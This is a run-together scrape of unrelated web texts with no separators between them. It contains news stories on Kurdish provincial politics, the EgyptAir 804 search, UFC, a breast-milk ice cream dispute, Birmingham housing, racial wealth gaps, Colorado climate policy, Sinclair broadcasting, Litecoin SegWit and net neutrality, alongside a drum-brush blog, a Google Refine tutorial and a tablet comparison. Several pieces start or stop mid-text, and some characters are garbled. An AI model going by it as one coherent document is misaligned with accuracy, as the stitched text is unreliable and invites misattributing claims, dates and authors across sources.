This is the way of the future, as politicians continue their war on the working class, while "acting" like our saviors and demanding a raise in the minimum wage. A raise – as anyone who understands economics 101 will understand – that will not bring more prosperity, but only inflation, wealth destruction, and misery. Good job, mission accomplished.
SULAIMANI, Iraq's Kurdistan region,— Despite an earlier agreement between the Change Movement (Gorran) and the Patriotic Union of Kurdistan (PUK) on the post of Sulaimani governor in Iraqi Kurdistan, the two parties are now in a deadlock and cannot agree on who should govern the province. The dispute is seen as a test to an alliance the two signed in May.
Haval Abubakir, from Gorran won the post of governor in the 2013 elections by 241 thousand votes but was denied the seat by the more powerful Patriotic Union of Kurdistan (PUK) and was instead made head of the provincial council.
Now Abubakir wants his post back which he believes is his rightful place. He event told Rudaw last week that he would start his duties as governor Sunday morning. The time passed and Abubakir's Gorran movement and the PUK haven't agreed on the issue.
The current governor of Sulaimani is Aso Faraidoon of the PUK.
Abubakir has thratened: “I will accept no post other than that of the governor,”
The PUK and Gorran have held three meetings in less than a week but with no deal, they have now agreed to meet again on August 25.
“We waited for the current governor to step down and we waited long but it never came,” Anwar Tahir, a Gorran member of the provincial council told Rudaw.
The PUK says that they are willing to hand over the post to Abubakir and that the current governor has written and signed his resignation, but that they differ on the way it should be done.
Salma Fatih, a PUK member of the provincial council told Rudaw that her group wants at least two thirds of the members of the council to ask the current governor to step down while Gorran wants the vote of 50+1 members to be enough to decide the matter.
When the PUK and Gorran agreed on the post after weeks of negotiations three years ago they did not set a mechanism by which the governor could be voted out towards the end of his term.
Now with equal numbers of council members the two parties are at a dead end. It is believed that some PUK council members are not willing to withdraw confidence from their own governor.
Unconfirmed reports suggest that the PUK has asked the Kurdistan Democratic Party (KDP) for help by having its members of the provincial council vote for the current governor to keep his post.
“The PUK just does not want to give up the post and keeps making excuses, otherwise Gorran and PUK have an earlier agreement between them on this,” a Gorran official told Rudaw.
Gorran and PUK signed an alliance on May 17 that brought both parties closer on national and regional politics and even had many speculate that the two might merge into one party as they were before 2009.
The new dispute over the governorship however, is seen by many as the first test of this alliance.
Rudaw has learned from well-placed sources who did not want to be named that Gorran leader Nawshirwan Mustafa has told his PUK partners that denying his group the post of governor “is like detonating a bomb underneath the May 17 treaty,”
Mustafa was said to have said this to the PUK the day he learned that the PUK members of the provincial council had boycotted a meeting during which a vote on the governor's post was expected.
By Nawzad Mahmoud and Hevidar Ahmed
Copyright ©, respective author or news agency, rudaw.net
Comments
Comments
Chuck showed me a really simple solution to this problem. Instead of playing spang-a-lang, sweep quarter notes with your right hand whenever you are comping on the "+" of beats two and four. Playing this way you still get the sensation of continuity and swing from your right hand, and you can get a nice big hit with your left hand. On the left is a video of me demonstrating some of this type of comping with "They Say It's Wonderful" from Chuck's terrific 2002 album "All This And Heaven Too".
Practical vs. Idealistic goals
Which leads me to a bigger point about setting musical goals. For me, you always have to find a balance between what you would ideally like to achieve, and what you need to achieve in order to be a working musician. The limiting factor of course, is time. Especially as I get older, I find that more and more I am trying to set goals that will get me hired for gigs.
That is not to say that setting super ambitious, really impractical goals is always a bad thing. If Ari Hoenig had given up on playing bebop melodies on the drum set because people thought it was impractical, we never would have gotten to hear this. And regardless of whether he is your favorite drummer, you have to admit that Ari's unique talent really opens up some new possibilities on the instrument.
Of course, there are lots of examples like Ari's in the history of jazz. Musicians who refused to accept what was possible or practical for whatever reason, and did things on their instrument that people had assumed was impossible. The legend goes that when Loius Armstrong first went to Europe, other musicians kept on examining his trumpet, assuming that he was able to play so high because of some sort of trick instrument.
That being said, you wouldn't know who Ari Hoenig, or Loius Armstrong for that matter, was if they weren't also able to do the things that got them hired for gigs in the first place! In other words, Ari can't just play melodies on the drums all day, he also has to play good time, interact with the band, learn hits, read music, play with brushes, and do all the myriad other less glamorous things that make up a working jazz drummers stock in trade.
So....
A practical exercise for developing Jeff's brush comping sound
This exercise was looking me right in the face from the beginning, but it took me a while to realize it. Here is what you do:
Syncopation Pg. 33-45
Both hands sweep continuously back and forth in a kind of windshield wiper motion
Both hands play the written line, right hand plays notes on the beat, left hand plays notes off
Whenever you have to play a rhythm from the written line, add a little pressure to your sweep with your fingers
Feet play regular jazz pattern, right foot lightly feathering on all four beats, left foot crisply closing the hihat on beats two and four
Aim for a relaxed, legato sound while still clearly delineating the written line. As with all things brush related, this is much easier to see and hear than it is to read about, so here is a video of me playing the first four lines from pg. 34.
There was no immediate word on the precise location of the wreckage or whether it included the data recorders that are essential for helping determine why the plane crashed.
The discovery was the first significant breakthrough in the search for the plane since investigators said they had detected signals from one of its two flight recorder beacons, or “pingers,” nearly two weeks ago.
With the battery life of those beacons expiring by next week, investigators are hoping to retrieve the recorders — which contain cockpit conversations and data from the plane's onboard computers — before they fall silent.
Investigators and search teams will begin mapping the debris field on the ocean floor, the Egyptian committee said. Even in the absence of the data from the flight recorders, air accident experts have said that the distribution of the wreckage would yield significant clues. If the debris contains large pieces of the plane that are concentrated in a relatively small area, that would suggest that the plane hit the water largely intact. Smaller debris scattered across a wide area would suggest that it broke up in midair — possibly the result of an explosion.
Remi Jouty, the director of France's air accidents bureau, which is advising Egypt in the investigation, said last week that investigators were still “very far” from understanding what may have caused the crash. Earlier this week, the Egyptian authorities appeared to back away from suggestions that Flight 804 had disappeared abruptly from radar screens — a scenario that had fanned theories that the plane might have been brought down by a terrorist bomb or other deliberate act, rather than a mechanical or other failure.
In the last 24 hours, UFC strawweight Paige VanZant has declared she is ready to make her comeback and asks fans who they want to see her fight next.
Speaking on Twitter, VanZant said “I can't wait to fight again!!!!!!! Get me back in there! who should I fight next??? Comment below. @ ufc # fanzant”
Scotland's Joanne Calderwood quickly responded “looking for a dance partner??…..I can't dance but I'm sure up for getting back into the cage asap with anyone“.
The pair were scheduled to fight at UFC Fight Night 80 back in December 2015, however Calderwood was forced to pull out due to injury and was replaced by Rose Namajunas.
Both VanZant and Calderwood are coming off quick losses, following very impressive knockout victories. In June 2016 Calderwood knocked out Valerie Letourneau following a body kick and punches. In August, VanZant followed with a stunning knockout of her own, with a jumping switch kick. Both women lost in round one via rear-naked chokes in the follow-up bouts, with Jessica Andrade submitting Calderwood and Michelle Waterson submitting VanZant.
Would you like to see Joanne Calderwood and Paige VanZant face off? Let us know in the comments below.
Take a look at the tweets:
I can't wait to fight again!!!!!!! Get me back in there! ??⭐️ who should I fight next??? Comment below. @ufc #fanzant pic.twitter.com/Yj94iIEHW7 — Paige VanZant (@PaigeVanzantUFC) January 31, 2017
looking for a dance partner??…..I can't dance but I'm sure up for getting back into the cage asap with anyone ?? https://t.co/dNNVf9PX3P — Jo Jo Calderwood (@DRkneevil) February 1, 2017
Using Google Refine to clean messy data
Download Installer
Refine is a powerful tool for working with messy data. If you're not familiar with a scripting language (or even if you are), it's is great for formatting and cleaning data without suffering through nested LEFT() and RIGHT() functions in Excel.
You can perform basic or sophisticated operations including splitting strings and pattern matching.
Here's a simple split operation
# split on `(` character and take the first element of the result "The Shining (film)".split('(')[0] # >>> yields `"The Shining"`
…and more complex pattern matching
# get area code from inside parens `()` "my number is (415) 555-5555. what's yours?".match(/(.+)\((.*)\)(.+)/)[1] # >>> yields `415`
…and you can split on a regex pattern
# split the domain from an email address "foobar@gmail.com".split(/(\w+?)(@)/) # >>> yields list with the gmail domain [ "", "gmail.com" ]
Refine supports regex in Google's regular expression language as well as Clojure and Jython.
Cleaning a messy dataset
This Civil War dataset has some pretty interesting information about battles and casualties, and you could make some interesting plots / visualizations with it. The dataset gives us a date column, but there's a problem.
Dates May 29-June 1, 1861 July 30, 1862 January 9-11, 1863
Battles which lasted only one day have a single date while battles that lasted more than a day have a range. This would be really tough to plot, so we'll have to fix that.
Create a Google Refine Project
Browse to your data and click next.
Refine will show you a preview of the data you're about to import. In this case, we want to import the data in the sheet named “Battle Listing”.
Handling the messy dates column
Let's separate the single date column into two columns for start and end dates.
Click the column's dropdown menu and choose
Column >> Edit column >> Add column based on this column
A dialogue box will open which will allow you to operate on the cells in the date column. The result of your operations will be stored in a new start column.
If you're not familiar with regular expressions, you can probably do what you need using functions about as straight forward as the ones in Excel.
Get the start date like so
# create column `start` from `dates` if(value.contains('-') , value.split('-')[0] + ',' + value.split('-')[1].split(',')[1] , value)
Gives us
Dates start May 17, 1864 May 17, 1864 January 9-11, 1863 January 9, 1863
Now we can get the end date using the same strategy. For battles that lasted just one day, just make the end date the same as the start date.
if(value.contains('-'), if(isNumeric(value.split('-')[1].split(',')[0]) , value.split('-')[0].split(' ')[0] + ' ' + value.split('-')[1].split(',')[0] + ',' + value.split(',')[1] , value.split('-')[1].split(',')[0] + ',' + value.split(',')[1]) , value)
This should take care of cells where the date range is on the cusp of two months (Jan-Feb vs. Jan 10-13).
Dates end May 29-June 1, 1861 June 1, 1861 January 9-11, 1863 January 11, 1863
Now we have the start and end columns, we don't need the original dates column. So let's delete that.
Column >> Edit column >> Remove this column
Now let's convert our new start and end columns into proper date format.
Column >> Edit cells >> Common transforms >> To date
At this point, I deleted the columns that I wasn't interested in such as References , Status , Photo Gallery , etc.
Exporting Cleaned Data
Now let's dump the data to a flat file and load it into R for plotting.
Click the export button in the top right corner.
Export >> Custom Tabular Export
In this dialog box, you can choose which columns you want to export in the Content tab. Click the Download tab to specify download options such as output format.
US singer threatens legal action against London store asking it to stop selling its latest, 'nausea inducing', product
The planet's most flamboyantly dressed pop star is threatening legal action against British manufacturers of the world's most bizarrely flavoured ice-cream.
Lady Gaga has told a store in Covent Garden, central London, to stop selling its latest brand, Baby Gaga – ice-cream made from human breast milk, blended with vanilla pods and lemon.
The US singer, whose last entanglement with foodstuffs involved wearing a dress stitched together from raw meat to an awards ceremony, appears unaware that the product she complained about disappeared off the company's shelves last week.
The day after it went on sale inspectors from Westminster council's food standards department confiscated the remaining scoops of Baby Gaga to check whether it met hygiene requirements.
Matt O'Connor, owner of the newly opened Icecreamists parlour, said he felt like a man "wielding two spoons engaged in hand-to-hand combat". Lady Gaga's letter, he said, "described me as the 'controlling mind' behind the ice-cream, which makes me sound like Blofeld, in a James Bond movie, bent on global domination.
"A global superstar has taken umbrage at what she describes as a 'nausea-inducing' product. This from a woman with a penchant for wearing rotting cows' flesh. At least our customers are still alive when they contribute to our 'art'.
"She claims we have 'ridden the coattails' of her reputation. As someone who has … recycled on an industrial scale the entire back catalogue of pop culture to create her look, music and videos, she might want to reconsider this allegation.
"How can she possibly claim ownership of the word 'gaga' which since the dawn of time has been one of the first discernable phrases to come from a baby's mouth?"
O'Connor said the costumes used in the ice-cream parlour were a reference to "Madonna's Jean-Paul Gaultier designed conical brassiere for the 1990 Blonde Ambition Tour (which itself was inspired by 1950's cone bras). It had no relation to the Lady herself."
Westminster council said it had removed the ice-cream because "selling foodstuffs made from another person's bodily fluids can lead to viruses being passed on and, in this case, potentially hepatitis".
O'Connor dismissed that claim, too. The woman who donated the breast milk, he said, "is a registered blood donor. So she has been screened both by us and a clinic."
Get the biggest daily stories by email Subscribe Thank you for subscribing See our privacy notice Could not subscribe, try again later Invalid Email
Rising demand from young professionals, students and investors will drive Birmingham's city centre residential market ever higher in the next five years, according to new research.
A report from property consultancy JLL, called 'West Midlands Residential Predictions 2017', says urban locations such as Birmingham will continue to push house price growth forecasts above the UK average of 13.1 per cent.
Richard Roberts, JLL's Birmingham-based residential director, said: "City centre schemes, such as Grand Central and the New Street station refurb, together with a significant boost to the city's retail, food and leisure offering, have changed historical perceptions of Birmingham.
"We are now seeing a turnaround in the appetite and desire for city centre living.
"The pace of change has played a huge part in the emergence of the Birmingham Private Rented Community (PRC) institutional investment model.
"Progress is gathering momentum and Birmingham is one of the leading beneficiaries, with several specialist PRC developments set to be delivered over the next five years.
"Already, we've seen forward funding deals agreed for 603 units completed at Exchange Square, near to the proposed HS2 Station, and 334 units at the old ice rink in Pershore Street.
"The city centre is now an attractive place for professionals to live, as well as work, and the main issue now is a lack of supply of quality development sites to satisfy demand."
Mr Roberts sees rising prices, rents and land values ahead for the next five years, as supply shortages impact the core residential market.
Rental increases have been seen at the top of the market with prime schemes achieving an average increase in rents of 4.9 per cent in 2016.
The new Housing White Paper suggests the Government is anxious to placate MPs who represent constituencies on the edges of the conurbation, by stressing its commitment to the green belt.
Mr Roberts believes that, given Birmingham's supply constraints, it is the surrounding authorities that will have to bear a large burden of land allocations.
He added: "Birmingham's need for 30,000 new homes by 2031 will come into conflict with the government's reticence to tackle Green Belt issues.
"There will be increased pressure to release land on Birmingham's outskirts, as we've already seen in Sutton Coldfield, and this will intensify further once HS2 gets closer to delivery, and as the appeal of Birmingham to broader audience increases.
"Encouragingly, some adjoining authorities have started taking a proactive approach to land supply problems, recognising the benefits of a well-planned solution.
"Others however, will be forced by default to address the issue through the Local Plan Review process."
Scholars gathered for the African American Economic Summit at Howard University on Friday sketched an alarming picture of the financial ills afflicting the black community even as the nation recovers from the recession.
The white-black wealth disparity is more than 20 to 1. Black homeownership has declined. Black joblessness is up. Black income is down.
As the conferees gathered, the government released new figures showing the black unemployment rate at 13.8 percent, nearly double the 7.0 percent for whites. The overall jobless rate is 7.9 percent.
As bleak as the economic picture is for black Americans, the immediate prospects for improving it are worse, many participants said. They agreed that chances are remote for the kind of aggressive, targeted action needed to combat those problems and close the economic disparities that have long separated blacks and whites.
“We are basically talking about an economic system that is shot through with discrimination,” said Bernard E. Anderson, a former assistant secretary of labor.
View Graphic Unemployment rate among blacks historically higher than for whites.
Despite that, Anderson and others said, President Obama seems reluctant to attack economic disparities between blacks and whites head-on.
Anderson said that Obama's second inaugural address was notable for lifting up gay rights, sounding the call for immigration reform and signaling his determination for women to receive equal pay in the workplace. “But there was not a single, blessed word on race,” he said.
Anderson said that he has met with Obama's economic advisers in years past, but did not get the sense that they were interested in any racially targeted economic remedies. “He does not want to be labeled a president who is consumed by racial inequality in this country,” Anderson said.
Others at the conference said that Obama took office during the worst downturn since the Great Depression and had his hands full forging policies to keep the economy from a full meltdown.
Meanwhile, administration officials have pointed out that the president's policies have led to 35 consecutive months of private-sector job growth and more than 6 million new jobs. They also note that the president's work to expand Pell Grants and extend the earned-income and child tax credits have helped millions of African Americans.
Nonetheless, conferees said that more needs to be done to close the racial disparities that have long been a feature of the nation's economic life.
During the depths of the crisis, Obama often said he wanted to build a better, more durable economy in the recovery. Conference participants said they are challenging him to live up to his word.
“We would all like to see him pursue that course,” said Ralph B. Everette, president and chief executive of the Joint Center for Political and Economic Studies, which co-sponsored the event.
Several scholars offered far-reaching, if politically unlikely, policy prescriptions.
Duke University professor William A. Darity Jr. said policymakers should pursue a large-scale public jobs program to dramatically lower unemployment. Darrick Hamilton, an economist at the New School, said the government should divert some of the money used to fund the income-tax deduction for mortgage interest to fund “baby bonds” that would provide $15,000 for disadvantaged newborns of any race to invest later in higher education, a business or a home.
The remedies need to be bold because “racial disparities are persistent and they are ubiquitous,” said Enrique A. Lopezlira, a lecturer at Howard. “It is hard to explain in a context that does not include some sort of institutional racism going on.”
Gov. John Hickenlooper announced Tuesday that Colorado will join the U.S. Climate Alliance and that by executive order, he will create a specific goal for carbon reduction.
Gov. John Hickenlooper announced Tuesday that Colorado will join the U.S. Climate Alliance — a coalition of states pledging to uphold the climate goals of the Paris Agreement after President Donald Trump withdrew the country from the agreement — and that by executive order, he will create a specific goal for carbon reduction.
Hickenlooper signed the order outside the Red Rocks Trading Post with a panoramic view behind him.
“The order sets concrete, measurable goals for the state,” he said.
Specifically, Colorado will try to cut greenhouse gases by 26 percent from 2005 levels by 2025. It also will aim to cut carbon from the electricity sector by 25 percent compared to 2012 by 2025 and 35 percent by 2030.
However, the executive order does not actually bind the state to that goal, nor does it give the state government any new regulatory powers.
“This is not government imposing a regime,” he said. Instead, Hickenlooper stressed “collaboration,” “market forces” and “innovation” as the main ways to meet the new goals
Following reporters' questions, he acknowledged that he doesn't yet have strong bipartisan support for the idea. “I expect we'll have strong Republican support. We're not there yet,” he said. And, in fact, Republicans in the Colorado Senate sharply rebuked the idea later in the day.
Previously, the state's long-term plan called for reductions to carbon emissions, which contribute to climate change, but the state government did not prominently advertise any detailed benchmarks for doing that.
“We can no longer rely on what happens or doesn't happen in Washington DC. … We need to have state leadership,” Aurora Mayor Steve Hogan said in introducing Hickenlooper.
Hickenlooper also said that a new electric vehicle plan to be created next year could link into nationwide plans for better electric infrastructure network.
“You'll be able to drive an electric car from Colorado to the Pacific and from Denver to Moffat County without fear,” the governor said.
Statehouse Republicans aren't happy.
Republicans in the state legislature objected to the new order and said that a court challenge is possible.
“This is not Washington, D.C, and here in Colorado we do not govern by executive order,” said Senate President Kevin Grantham in a news release.
“The governor's failure to proceed in an open, collaborative, bipartisan way means this policy never will have the stamp of public legitimacy it needs, and that it most likely will be challenged in court.”
Colorado's last governor, Democrat Bill Ritter, also used an executive order to set climate goals. Hickenlooper's spokeswoman, Jacque Montgomery, said that the governor has the power to set goals.
The Senate Republicans press release claimed that the move is “seen by some as a response to weeks of political pressure from California billionaire and Democrat kingmaker Tom Steyer.”
John Cooke, a state senator and the majority whip, argued in the press release that the new goals would implicitly require “losing additional power plants ahead of schedule and creating substantial unemployment is rural communities.”
For his part, Hickenlooper said today that market forces are naturally shifting away from coal and toward renewables and natural gas.
He promised that Colorado is “going to do all this, also, without leaving anyone behind,” and he said that he would push for economic support for communities affected by the decline of coal.
This isn't Colorado's first climate-change goal.
Former governor Bill Ritter in 2007 and 2008 called for reductions of 20 percent by 2020 and 80 percent by 2050, but there had been little recent mention of that goal in state politics, according to two experts.
“Gov. Ritter set forth this greenhouse gas reduction plan, but there was nothing binding about it, and it's not typically referred to as something we do at the state level,” said Erin Overturf, chief energy counsel for Western Resource Advocates, in an interview last month.
Hickenlooper last year floated the idea of a 35 percent cut to greenhouse pollution from power plants by 2030, but the idea quietly disappeared after oil-and-gas backlash.
Paul Chinowsky, a CU Boulder professor and co-founder of Resilient Analytics, was somewhat critical of the state's efforts in a recent interview with Denverite.
“Colorado at a state level talks a lot about it, but Colorado's being driven a lot more at the local level,” he said late last month. “We write Colorado action plans and climate plans, but we're not seeing the action.”
Colorado now is the 13th state to join the U.S. Climate Alliance, which was launched last month by the governors of New York, Washington and California. Puerto Rico also is a member.
As an executive order, the new goals could easily be rescinded by the next governor after Hickenlooper's term ends next year. Asked whether that worried him, he said that the strength of the plan would help it survive.
For a deeper look at what Colorado has and hasn't done on climate change, check out our earlier coverage.
Updated: November 6, 2012 5:22 p.m.
If you live in or around Columbus, Ohio, and were watching TV last night, you may have seen a local news team presenting some peculiar analysis of the presidential race.ABC affiliate WSYX in Columbus aired a half-hour “election special” twice on Monday night — first at 6:30 p.m. instead of World News with Diane Sawyer, and later at 11:30 p.m., during the slot normally held by Nightline. Rather than a side by side comparison of the two major party candidates, however, the special featured some of the most partisan criticisms of President Barack Obama, and spent relatively little time examining Republican nominee Mitt Romney.
“Much of the first two years of President Obama's term in office was spent developing and defending Obamacare — that's the Affordable Care Act, signed into law in March of 2010,” anchor Bob Kendrick said, near the program's halfway point. “It supposedly guarantees health care for any U.S. resident who could not obtain good health care otherwise. The biggest parts of the law go into effect in 2014, with other pieces of it rolling out over the next decade. The cost of Obamacare is making many Americans sick to their stomach, though.”
TPM has learned that WSYX and at least one other station operated by the Sinclair Broadcast Group in the crucial swing state last night aired election specials, which included content prepared by their corporate parent company. Some TPM readers may recall Sinclair has a history with this kind of thing. In the run up to the 2004 election, controversy erupted over the company's plan to air a movie attacking then-Democratic presidential nominee John Kerry's Vietnam record. Sinclair “owns and operates, programs or provides sales services to 74 television stations in 45 markets,” according to the company's website.
The half-hour program that aired on WSYX, obtained by TPM, was billed on the station's website as “ABC 6 Election Speical – VOTE 2012.” But at times, it sounded more like Fox News than local news.
“Chuck Weber examines how even the 7.9 percent unemployment rate may not really reflect the true picture of how many families continue to struggle,” anchor Yolanda Harris said, introducing a segment looking at the job market.
To be sure, the program included some people speaking favorably of Obama. But on balance, Obama criticisms were elevated, while Mitt Romney seemed to escape the bulk of the attention. Here, for instance, is a graphic on the unemployment rate emphasizing how high it has been in the past, compared to the current figure:
Later in the program, a segment on the health care reform law ends, and the anchors transition to “foreign policy,” which focuses on the September attack on the U.S. consulate in Benghazi, and leans heavily on Republican allegations that the Obama administration has lied to the public about what it knew and when it knew it.
“Well now to foreign policy,” Harris said. “Did the administration lie about terrorist attacks on a U.S. consulate in Libya on September 11th? Everyone from the State Department to the White House wanted you to believe it was a protest over an anti-Muslim movie. The U.S. ambassador and three others died in that attack. The administration alleges misinformation for blaming the deaths of four Americans on a movie. But the truth finally surfaced amid claims our government knew of the terrorist attack all along.”
Watch:
Â
Â
Â
Â
Â
Monday night, TPM spoke with newsroom employees at WSYX and WRGT, a Fox affiliate in Dayton. Both employees said the stations aired the specials with content produced by Sinclair. Before transferring a TPM reporter to the voicemail of WSYX's General Manager Dan Mellon, a WSYX newsroom staff member who didn't give his name said Sinclair's corporate office in Baltimore “put it all together,” referring to the special.
Cara Neace, a newsroom employee with WRGT, said an election special was scheduled to run at 10:30 p.m. on Monday. Neace said WRGT had received “packages” for the special from Sinclair, but that it was common for Sinclair affiliates to receive and share each other's content.
“This happens all the time when we get stuff from Baltimore or Columbus,” Neace said.
TPM could not verify if the special that ran on WRGT used the same packages as those that aired on WSYX.
A call to Sinclair's corporate headquarters was not returned.
Update 5:22 p.m.: It turns out that CBS affiliate and Sinclair station WPEC in West Palm Beach, Fla. also ran an election special Monday night, featuring many of the same packages and scripts included in the WSYX broadcast. You can watch the whole thing here. (Click “Recap: CBS 12 Election Special.”)
Thanks to reader MT for the tip.
It's official. Litecoin, one of the oldest and biggest altcoins by market cap, deployed Segregated Witness (SegWit) today. The protocol upgrade that was originally developed for Bitcoin and proposed by the Bitcoin Core development team locked in on Litecoin two weeks ago, and was enforced by a majority of hash power on the Litecoin network as of a couple of hours ago.
The Segregated Witness soft fork activated without major issues — though there was an early slip up by the biggest Litecoin mining pool on the network.
“F2Pool had a hiccup where they were not mining Litecoin correctly. For some reason their LTC pool was returning a BTC template to miners. We reached out to them and they fixed it right away,” Litecoin inventor Charlie Lee told Bitcoin Magazine.
SegWit
Launched in 2011, Litecoin was one of the first altcoins to gain significant traction. As opposed to some newer altcoins like Ethereum, Ripple and Monero, Litecoin is a straight fork of Bitcoin's codebase but with a different mining algorithm and some changed parameters, such as faster confirmation times. This similarity to Bitcoin does mean that Litecoin suffers from similar weaknesses as Bitcoin, like transaction malleability.
And, indeed, that it can adopt similar solutions and improvements, like Segregated Witness.
While Litecoin inventor Charlie Lee has been advocating for activation of the soft fork since late 2016, miner support initially did not follow. This changed following the Global LTC Roundtable Meeting, an online meeting held amongst prominent stakeholders in the Litecoin industry, who are based particularly in China. The participants agreed on “Litecoin Global Roundtable Resolution 001 (2017),” which, among other things, holds that the mining pools would activate SegWit.
With its SegWit activation, the “silver to Bitcoin's gold” has immediately reclaimed a place in the spotlight, and the markets have been taking notice. Having lingered in Bitcoin's shadow for years at price levels below $5, Litecoin's exchange rate surged almost tenfold in anticipation of SegWit. The altcoin reached almost $40 today and is trading around $33 at time of publication.
Bitcoin
Perhaps even more important, some prominent Bitcoin projects — like .NET Bitcoin library NBitcoin and wallet mSIGNA — announced to port their work to Litecoin now that it has enabled SegWit. Even more notable, Lightning Labs will roll out a version of their lightning network implementation on Litecoin, while ACINQ has tested their lightning software on the altcoin, too. Similarly, Bitcoin Core developer Johnson Lau, one of the authors of SegWit, has indicated that he will realize smart-contracting solution MAST on Litecoin.
Further down the road, Segregated Witness enables more innovations that could be deployed on Litecoin first. Confidential Transactions, Schnorr signatures and TumbleBit are all in the works for Bitcoin, and shouldn't take too much effort to port to Litecoin.
Lee himself, furthermore, hopes that atomic swaps will soon see the light of day, enabling an instant and trustless altcoin exchange and lightning network type of transactions across different digital currencies.
“SegWit opens up the doors to many amazing features that can be added to Litecoin,” Lee said. “These include Lightning Network, MAST, Confidential Transactions, Schnorr Signatures and more. I think Litecoin can show Bitcoin that SegWit is indeed the best way to improve the protocol. So I think it will help get that happening sooner on Bitcoin.”
Segregated Witness is still pending activation on Bitcoin, where it requires 95 percent hash power support. It has stagnated at around 30 percent so far.
There are two kinds of technology buyers in the world: those who love the technology itself, and those that just want to get things done. Most tech analysts and bloggers, myself included, fall naturally into the first category. We have strong opinions about licensing, patents, openness, walled gardens, review processes, frequency of OS upgrades, and many other esoteric topics that are all unimportant to the second group. To us, technology is like politics. Some are more hard-core than others but we're all biased in one way or another. Or if you prefer: passionate.
The second category is much larger. These are people who see technology as a means to an end. When making their buying decisions they are looking at price, features, aesthetics, stability, and customer service. They tend to be much more practical than the first group, with specific needs such as reading, making calls, and web browsing that must be satisfied before anything else is considered. To continue with the political analogy, these are the independents. They'll support whichever side brings them the best results.
The reason I mention all this is because the decision between two devices such as the iPad mini and the Nexus 7 depends first and foremost on which type of person you are. Are you in it for the technology, or for the practical benefits? Do you want the tech to be in your face or to disappear into the background? The answer is much simpler for the first group so let's take them first.
Technology focus
If you fall into this group then you have probably already made up your mind and just don't realize it. Look around at what other devices and computers you use. Do you regularly use a Mac? An iPhone? Do you closely follow Apple announcements of new releases? Did you mourn the loss of Steve Jobs, and feel the company might lose its way without him? Then go ahead and get the iPad. It'll be familiar to you. You'll feel good about yourself, like you're a part of something bigger.
On the other hand, if you value openness over simplicity and you're not locked into the Apple world, then consider the Nexus 7. You get more cores, a higher clock rate, more memory, a higher resolution, a GPS, and a cheaper price. Spec-wise, the only advantage the iPad has been the physical size of the screen (7.9 vs. 7.0 inches). Some people prefer the iPad's square-ish aspect ratio while others prefer the more movie-friendly rectangular format on the Nexus 7, so that's just a personal choice. The iPad is a bit thinner but both will fit in a pocketbook or a big pair of cargo pants.
Both the iPad mini and the Nexus 7 enjoy up to date OTA updates direct from Apple and Google, respectively. So there's no worry about having an old OS version. Both are jail-breakable if you're into that kind of thing, though the Nexus, like all Android devices, wins hands down in terms of the breadth and depth of its modding community. It's Linux after all.
Functional focus
Before the Nexus 7, if you asked me what tablet to get for your non-technical family member I would have said iPad every time. Yes, that's right, me, author of a book on Android, writer of many articles espousing the benefits of Android, I was recommending iPads. Why? Well, for one thing I actually do own both Android and iOS tablets. I bought an iPad 1 as soon as it came out. But then something funny happened. It vanished. Stolen!
Ok, not stolen exactly. My wife "borrowed" it. You have to realize, this is a woman who eschews the same high tech devices that I get so worked up about. She won't use laptops because she hates the small screens and trackpads. She won't use a smartphone because the battery doesn't last long enough. When she's out and gets lost she calls me up so I can function as sort of remote "Google Maps viewer" for her. I love her to death, but in my mind she's something of a Luddite. But she. Took. My. Ipad.
My wife is strongly in the functional, practical camp. She practically defines it. For her, the iPad does exactly what she wants: It reads mail, it browses the web, and it plays games. Oh, the games. Whoever invented the freemium in-app purchase model of games owes me a lot of money, let me tell you. But I digress.
Another nice thing about all iPad models is the battery life. You can use it all day and it won't run out of juice. Or even nicer, you can *not* use it for a few days and you won't come back to a dead machine. For functional folks like my wife, there's nothing more frustrating than wanting to get something done but being prevented by the technology. That's true whether it's a tablet, an electric car, or a hand mixer. They want to rule the technology, not the other way around.
The Nexus 7 is different though. I know I'm biased, but I really like this device. It's small so it's easy to carry around. It does everything the iPad mini can do and more. It's fast and buttery smooth. It's easy to use and just works. Because it has a GPS you can use maps, and they work great. The thing that really pushes it over the edge for practical-minded users, though, is the price.
Consider two equally well equipped mini tablets: one Nexus 7 and one iPad mini. Both with lots of room for games and other content. Both with high speed cellular access for those times you can't get a WiFi signal. Look at the price difference:
Google Nexus 7, 32GB, WiFi, HSPA+, AT&T: $299
Apple iPad mini, 32GB, WiFi, HSPA+/LTE, AT&T: $559 ($659 for 64GB)
The iPad mini costs almost twice as much as the Nexus 7. That's incredible. I don't normally use the term "Apple tax", but according to hardware breakdowns the mini only costs about $15 more to make, mostly due to the larger screen. Do the math: you're paying a $249 premium for the Apple device.
Remember the old Hyundai ads where the car was so cheap the guy bought two of them, and then he had to drive both back home? It was funny because it was ridiculous; he would drive one a few feet, get out, walk back to the other one and catch up, then repeat. I'm sure somebody in the comments can find us a link to the video if you missed it. My point is that at this price, you could buy two Nexus 7's for a little more than the less functional Apple mini. One for you and one for your spouse or significant other, perhaps?
Conclusion
If the politics of technology is your main concern and you've intertwined your life with Apple, then just stick with the Apple iPad mini. It's a perfectly capable and fun device. If price is no object and there are other considerations like apps or games that haven't been ported to Android yet, or you just want that Apple status symbol (nothing wrong with that, let's be honest) then you might want to go with the Apple device. However, if you want cutting edge hardware including GPS, or if you're into customization and modding, or if you'd like to either save money or buy two for the price of one, then the Nexus 7 is the clear choice.
The internet is fucked, and the US government is making it worse.
Political cowardice set the FCC up to lose its first battle for net neutrality regulation: the rules that keep the internet as you know it free and open. The idea of net neutrality is that all traffic is created equal — whether it's a movie streaming from Netflix, or a WhatsApp message, or a Tweet, or a round of Titanfall. But according to a report from the Wall Street Journal, the FCC is now considering new rules that tear down the fundamental principle of net neutrality. The proposal would allow profit-hungry behemoths like Comcast, AT&T, and Verizon to become gatekeepers that give preferential treatment to companies that pay the most for special access to internet users.
Cowardice and complicity plague the FCC
If cowardice caused the FCC to lose its first major net neutrality battle, complicity with the ISP industry is leading to its second major failure. The proposed rules would mark a complete capitulation to the monied internet interests, harming consumers in the short and long-term. The ISPs that control the "last mile" of the internet — the pipes that connect to your home — would love nothing more than to extract tolls from companies that deliver internet services. Netflix's surrender to Comcast sits in the murky waters of "peering," where major ISPs connect to one another, but the new rules could mean that similar deals are made in the last mile of the internet where net neutrality thrives. In the future, your internet provider could allow companies with the most cash to shut out other services that have to wait in line to reach you. That means the next YouTube or Facebook could be slaughtered by wealthy competitors instead of being tested on their merits.
